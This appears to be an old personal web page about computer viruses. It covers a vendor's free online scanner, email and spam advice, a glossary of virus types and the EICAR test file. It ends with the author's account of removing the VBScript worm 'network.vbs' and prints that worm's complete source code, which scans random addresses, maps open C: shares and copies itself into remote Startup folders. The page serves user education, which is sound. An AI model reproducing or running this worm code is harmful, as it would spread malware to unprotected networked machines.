VIRUS.htm
1A15

COMPUTER VIRUSES

Scroll down to view information about the following:

1. how to have HouseCall scan your computer for viruses while you are on line, for free.
2. e-mail viruses
3. spam
4. a glossary of virus terms
5. a harmless test virus
6. the virus file I removed from my own hard drive, how I viewed the code written in the virus file, what the virus was designed to do, and how little it affected my computer.

To have your computer scanned for viruses, just visit www.antivirus.com/ (its free).

1. If you want an explanation first, read http://www.antivirus.com/free_tools/ and www.antivirus.com/vinfo/ ).
2. If not, just click on this link to http://housecall.antivirus.com/housecall/start_pcc.asp and HouseCall will immediately begin the process of checking your computer for viruses. Try not to get alarmed when it starts running automatically (via an ActiveX control) after you click on this link.
3. Be patient for a few minutes even if HouseCall takes a while to load its web page and download its free virus checking program. Select the hard drives you want scanned for viruses. I do not select AUTO CLEAN because I want to examine the construction of any virus found. Relax and read a book while Housecall scans all the files on the hard drives you select.
4. HouseCall will display its report after it finishes scanning your hard drive. If HouseCall finds a virus on your computer, do not push the panic button. Just calm down and read HouseCall's explanations about the virus it found and how you can remove the virus from your computer (I removed one).
5. If you have time, read www.guardcentral.com/ about computer security.

E-MAIL viruses

If you receive an e-mail with an attached file from an unknown source, simply delete it. Viruses and Trojan programs must have code that is executed in order to infect. If you "double-click" an attached file on an e-mail message, you are executing code and may infect your machine. (Note: Newer antivirus software is capable of scanning these attachments before they are opened.)

SPAM

More about Spam is at http://www.antivirus.com/cybercontent/spamFAQ.htm

Do not try to unsubscribe: many spammers use the reply options to confirm the validity of the e-mail address.

Set your filters in Outlook or your e-mail application to file or delete spam-like mail. Try blocking e-mail with words in the header or the body such as "Free" or "Money" or "Sex." Information on Filtering can be found at Spam Abuse Net.

Register with Network Abuse Clearinghouse http://abuse.net/ and report all spam through their remailer service.

Forward spam to Trend's spam collectors at spam@trendmicro.com so that they can update filters that block new spam messages.

Glossary of Virus Terms (scroll down for definitions)

ActiveX malicious code
Aliases
Boot sector viruses
Date of origin
Description
Destructive viruses
ELF
Encrypted viruses
File infecting viruses
In-the-Wild virus list
Java malicious code
Joke programs
Language
Malware
Macro virus
NE
Password
Payload
PE
Place of origin
Platform
Risk rating
Size
Script viruses
Solution
Tech details
Trigger condition/date
Trojan
Virus types
Worm

ActiveX malicious code
ActiveX controls allow Web developers to create interactive, dynamic Web pages with broader functionality such as HouseCall, Trend Micro's free on-line scanner. An ActiveX control is a component object embedded in a Web page which runs automatically when the page is viewed. In many cases, the Web browser can be configured so that these ActiveX controls do not execute by changing the browser's security settings to "high." However, hackers, virus writers, and others who wish to cause mischief or worse may use ActiveX malicious code as a vehicle to attack the system. To remove malicious ActiveX controls, you just need to delete them.

Aliases
There is no commonly accepted industry standard for naming viruses and malicious mobile code. Each may be known by several different names or aliases. See virus types for an explanation of Trend Micro virus-naming conventions.

Boot sector viruses
Boot sector viruses infect the boot sector or partition table of a disk. Computer systems are most likely to be attacked by boot sector viruses when you boot the system with an infected disk from the floppy drive - the boot attempt does not have to be successful for the virus to infect the hard drive. Also, there are a few viruses that can infect the boot sector from executable programs- these are known as the multi -partite viruses and they are relatively rare. Once the system is infected, boot sector virus will attempt to infect every disk that is accessed by that computer. In general, boot sector viruses can be successfully removed.

Date of origin
Indicates when a virus was first discovered (if known).

Description
This is a brief summary of a virus listed in the Trend Virus Encyclopedia. For detailed technical information, click on the "Tech Details" tab.

Destructive viruses
In addition to self-replication, computer viruses may have a routine that can deliver the virus payload. A virus is defined as destructive if its payload does some damage to your system, such as corrupting or deleting files, formatting your hard drive, and committing denial-of-service attacks etc.

ELF
ELF refers to Executable and Link Format, which is the well-documented and available file format for Linux/UNIX executables. Trend products detect malicious code for Linux/UNIX as "ELF_Virusname."

Encrypted viruses
Indicates that the virus code contains a special routine that encrypts the virus body to evade detection by antivirus software. Trend Micro’s antivirus products have the ability to decrypt the virus body and detect such viruses.

File infecting viruses
File infecting viruses infect executable programs (generally, files that have extensions of .com or .exe). Most such viruses simply try to replicate and spread by infecting other host programs - but some inadvertently destroy the program they infect by overwriting some of the original code. There is a minority of these viruses that are very destructive and attempt to format the hard drive at a pre-determined time or perform some other malicious action. In many cases, a file-infecting virus can be successfully removed from the infected file's program. If the virus has overwritten part of the code, the original file will be unrecoverable.

In-the-Wild virus list
The In-the-Wild virus list is a list of the most common viruses that have been found infecting users’ computers worldwide. The list is compiled by the renowned antivirus researcher Joe Wells. Wells updates the list regularly, working closely with antivirus research teams around the world, including Trend Micro’s. When ICSA (International Computer Security Association) conducts virus testing of antivirus products, the In-the-Wild virus list serves as the basis for its comparative analysis. More info: http://www.wildlist.org

Java malicious code
Java applets allow Web developers to create interactive, dynamic Web pages with broader functionality. Java applets are small, portable Java programs embedded in HTML pages. They can run automatically when the pages are viewed. However, hackers, virus writers, and others who wish to cause mischief may use Java malicious code as a vehicle to attack the system. In many cases, the Web browser can be configured so that these applets do not execute by changing the browser's security settings to "high."

Joke programs
Joke programs are ordinary executable programs. They are added to the detection list because they are found to be very annoying and/or they contain pornographic images. Joke programs cannot spread unless someone deliberately distributes them. To get rid of a Joke program, delete the file from your system.

Language
This refers to the language locale of the virus working platform such as MS Word in English or Chinese.

Malware
Malware is a general term used to refer to any unexpected or malicious programs or mobile codes such as viruses, Trojan, worm, or Joke programs.

Macro virus
Macro viruses are viruses that use another application's macro programming language to distribute themselves. They infect documents such as MS Word or MS Excel. Unlike other viruses, macro viruses do not infect programs or boot sectors - although a few do drop programs on the user's hard drive. The dropped files may infect executable programs or boot sectors. Macro viruses can be removed safely from the infected document using Trend Micro’s antivirus products.

Special note: Occasionally, you may get an "illegal operation" error when you try to start MS Word after cleaning a Word macro virus. If this happens, search for the file "normal.dot" and rename it to "normaldot.bak." MS Word will generate a new, clean "normal.dot" the next time it is started. This problem occurs because some viruses can leave harmless code residue that MS Word may be reading incorrectly, causing erratic behavior. Trend antivirus software only removes malicious viral code and not user-created macros.

NE
NE refers to New Executable, which is the standard Windows 16-bit executable file format. Windows 16-bit viruses are detected by Trend products as "NE_Virusname."

Password
Some viruses set a password when they infect a document. The main objective of the virus here is to make the document inaccessible. This password can be a word, phrase, or even a randomly generated number.

Payload
A virus’ payload is an action it performs on the infected computer. This can be something relatively harmless like showing messages or ejecting the CD drive, or something destructive like deleting the entire hard drive.

PE
PE refers to Portable Executable, which is the standard Win32 executable file format. Windows 32-bit viruses are detected by Trend products as "PE_Virusname."

Place of origin
Indicates where a virus is believed to have originated (if known).

Platform
Indicates the computer operating system or application on which a virus can run and perform an infection. Generally, a particular operating system is required for executable viruses and a specific application is needed for macro viruses.

Risk rating
The risk rating of a virus is an assessment of the threat posed by a virus. It is based on a number of different factors including, but not limited to, potential to spread, destructiveness of the payload, and actual number of cases reported etc.

Size of macro/malicious code/virus
Indicates the size of the virus code in bytes. This number is sometimes used as part of the virus name to distinguish it from its variants.

Script viruses (VBScript, JavaScript, HTML)
Script viruses are written in script programming languages, such as VBScript and JavaScript. VBScript (Visual Basic Script) and JavaScript viruses make use of Microsoft's Windows Scripting Host to activate themselves and infect other files. Since Windows Scripting Host is available on Windows 98 and Windows 2000, the viruses can be activated simply by double-clicking the *.vbs or *.js file from Windows Explorer.

HTML viruses use the scripts embedded in HTML files to do their damage. These embedded scripts automatically execute the moment the HTML page is viewed from a script-enabled browser.

Solution
Most viruses can be cleaned or removed from the infected host files by Trend’s antivirus software. Special removal instructions are provided for viruses or Trojans that modify the system registry and/or drop files. Generally, to remove Trojans or Joke programs, you just need to delete the program files - no cleaning action is needed.

For a quick check-up of your PC, use HouseCall - Trend Micro's FREE on-line virus scanner. This will check for viruses which may already be on your PC.

To keep your computer healthy by catching viruses before they have a chance to infect your PC or network, get the best antivirus solution available today. Trend Micro offers antivirus and content security solutions for home users, corporate users, and ISPs.

Technical details
The "technical details" section of a Virus Encyclopedia profile contains specific information about the actions performed by a virus on the host system. This information is provided to assist system administrators in identifying and removing viruses. Home users should use an automated tool like Trend PC-cillin or Trend’s FREE online scanner – HouseCall – to detect and remove viruses from their computer.

Trigger condition or date
This is to indicate the condition or date on which the virus’ payload will be triggered. Please note that date-activated viruses may infect your computer 365 days a year. Your computer may be infected by these viruses prior to the date specified.

Trojan
A Trojan horse is a program that performs some unexpected or unauthorized, usually malicious, actions such as displaying messages, erasing files or formatting a disk. A Trojan horse doesn’t infect other host files, thus cleaning is not necessary. To get rid of a Trojan, simply delete the program.

Virus types
Viruses and other malware are classified into various types depending on their file formats and infection routines. To distinguish among these types, Trend Micro uses the following prefixes:

ActiveX malicious code - ATVX
Boot sector viruses - no prefix
COM and EXE file infectors - PE, NE, or no prefix
Executable and Link format - ELF
Joke programs - JOKE
Java malicious code - JAVA
Macro viruses - W2KM, W97M, X97M, P97M, A97M, WM, XM, V5M
Trojan horses - TROJ
VBScript, JavaScript or HTML viruses - VBS, JS, HTML

Worm
A computer worm is a self-contained program (or set of programs) that is able to spread functional copies of itself or its segments to other computer systems. The propagation usually takes place via network connections or email attachments. To get rid of a worm you just need to delete the program.

A HARMLESS TEST VIRUS

The EICAR Standard Antivirus Test File can be downloaded from http://www.antivirus.com/vinfo/testfiles/

The EICAR organization or European Institute of Computer Anti-virus Research, along with antivirus vendors, has developed this test file to assist users in testing their installations of antivirus software. It is recommended that vendors detect this file.

This is NOT A VIRUS. The file is a test file which may be used to test antivirus software.  The code is harmless and when detected properly the virus scanner will display the following message: EICAR-TEST-FILE

• Download this test file: eicar.com (HTTP)
• Download this test file: eicar.com (FTP)

HOW I REMOVED A VIRUS FROM MY COMPUTER

A free scan of my computer by www.antivirus.com found on the C:/ drive of my computer a "Non Cleanable" virus in the following three directories:

1. C:\WINDOWS\StartMenu\Programs\Startup\network.vbs
2. C:\WINDOWS\network.vbs
3. C:\network.vbs

I found an identical virus file in all three of the above directories and deleted them after I edited one with NotePad to view it English language codes.

The following information about the network.vbs virus came from www.netvirus.com

VBS_NETLOG.WORM
Risk rating:
Virus type: VBScript
Destructive: N

Aliases:
NETLOG.WORM , NETWORK.VBS

Description:
This Trojan when run searches for a computer in the network where c:\ is shared with full control and accesses files. This virus does not run on Windows NT environment.

Solution:
Please delete the file "network.vbs" located in directories where it was added. You may also disconnect mapping of the network drive to ensure complete safety.

If you need further assistance with this solution, please send an email to virus_doctor@trendmicro.com.

Trend Micro offers best-of-breed antivirus and content-security solutions for your corporate network or home PC.

VBS_NETLOG.WORM (continued from profile page)

In the wild: Yes
Trigger date 1: Any Day
Payload 1: Others (drops files in directories)
Payload 2: Others (accesses files with full shared control in network)
Detected by pattern file#: 659
Detected by scan engine#: 2.082
Language: English
Platform: Windows
Encrypted: No
Size of virus: 2,429 Bytes

Details:
Upon execution, this Trojan checks for the file “network.log” in the c:\ drive, then it writes the text “Log file Open” to this file. It then writes in this log file random addresses with the text:
“ Subnet : ...0 “
where:
Random number 1 is the number between 199 to 214
Random number 2 and Random number 3 is the number between1 to 254

Then the malware picks a random address for it to scan. After this, the virus checks for a computer in a network wherein the shared format of c:\ is full control. It then maps the c:\ of the infected computer as j:\.

The Trojan also adds the following line to the log file “network.log” for every drive it has mapped:
“Copying files to :
and checks the first network.vbs file it copies and then writes to the log:
“Successful copy to : ” if copy is successful.

After mapping c:\ to j:\, it copies the file network.vbs to the following locations:
J:\windows\startm~1\programs\startup\
J:\windows\
J:\windows\start menu\programs\startup\
J:\win95\start menu\programs\startup\
J:\win95\ startm~1\programs\startup\
J:\win95\

When the infected computer reboots, the virus runs because it is at the startup directory. With this the hacker can access all the files in c:\.

The form of lookup by this worm can also act as a Distributed Denial of Service (DDOS) attack since the queries the virus performs can overwhelm a server until all requests cannot be serviced anymore, thereby crashing the system.

Two House Call reports about my own hard drive

HouseCall informed me it could not access the files listed below. Please note that there is the  potential of virus infection in files HouseCall cannot scan

(I just left some of these file alone because I was not sure what would happen to my computer if I deleted them.).

HOW I VIEWED THE INTERNAL STRUCTURE
OF THE VIRUS HOUSECALL FOUND ON MY COMPUTER

After I transferred one copy of the three identical 237KB VBScript files named "network.vbs" to a folder I named VIRUS in my Documents folder, I right clicked on the file name "network.vbs" with my mouse to view its Properties. I changed the Property of the file from Read Only so I could edited it with Notepad (Properties also revealed that the "network.vbs" virus file was created on September 28, 1999 and modified Sunday January 9, 2000). After I examined the contents of the file, I deleted them and then deleted the file, which contained the following instructions (which might be used to recreate the virus).

dim octa
dim octb
dim octc
dim octd
dim rand
dim dot
dim driveconnected
dim sharename
dim count
dim myfile
count = "0"
dot = "."
driveconnected="0"
set wshnetwork = wscript.createobject("wscript.network")
Set fso1 = createobject("scripting.filesystemobject")
set fso2 = createobject("scripting.filesystemobject")
on error resume next
randomize
checkfile()
randaddress()

do
do while driveconnected = "0"
checkaddress()
shareformat()
wshnetwork.mapnetworkdrive "j:", sharename
enumdrives()
loop
copyfiles()
disconnectdrive()
loop

msgbox "Done"

function disconnectdrive()
wshnetwork.removenetworkdrive "j:"
driveconnected = "0"
end function

function createlogfile()
Set myfile = fso1.createtextfile("c:\network.log", True)
end function

function checkfile()
If (fso1.fileexists("c:\network.log")) then
fso1.deletefile("c:\network.log")
createlogfile()
else
createlogfile()
end If
myfile.writeLine("Log file Open")
end function

function copyfiles()
myfile.writeline("Copying files to : " & sharename)
Set fso = CreateObject("scripting.filesystemobject")

fso.copyfile "c:\network.vbs", "j:\"

If (fso2.FileExists("j:\network.vbs")) Then
myfile.writeline("Successfull copy to : " & sharename)
End If

fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\windows\"

fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\wind95\"

end function

function checkaddress()
octd = octd + 1
if octd = "255" then randaddress()
end function

function shareformat()
sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C"
end function

function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
driveconnected = 1
else
' driveconnected = 0
end if
Next
end function

function randum()
rand = int((254 * rnd) + 1)
end function

function randaddress()
if count <50 then
octa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
octa= rand
end if
randum()
octb=rand
randum()
octc=rand
octd="1"
myfile.writeLine("Subnet : " & octa & dot & octb & dot & octc & dot & "0")
end function

WHAT THE VIRUS DID TO MY COMPUTER

My C:\network.log file contained the information below, some or all of which was written there by the virus program, according to the description above. I opened the file in Notepad and changed its attribute from "Archive" to see if I could delete any of the following information (not that I need to), but failed (maybe the MS-DOS editor could change it).

Log file Open
Subnet : 204.235.96.0
Subnet : 214.236.191.0
Subnet : 207.181.47.0
Subnet : 214.78.187.0
Subnet : 209.88.46.0
Subnet : 201.141.92.0
Subnet : 199.69.133.0
Subnet : 208.244.120.0
Subnet : 199.225.212.0
Subnet : 200.150.39.0
Subnet : 209.221.172.0
Subnet : 200.156.56.0
Subnet : 206.150.224.0
Subnet : 202.73.206.0
Subnet : 202.128.212.0
Subnet : 201.95.149.0
Subnet : 201.203.3.0
Subnet : 204.43.49.0
Subnet : 210.193.108.0
Subnet : 200.102.8.0
Subnet : 214.140.198.0
Subnet : 210.166.127.0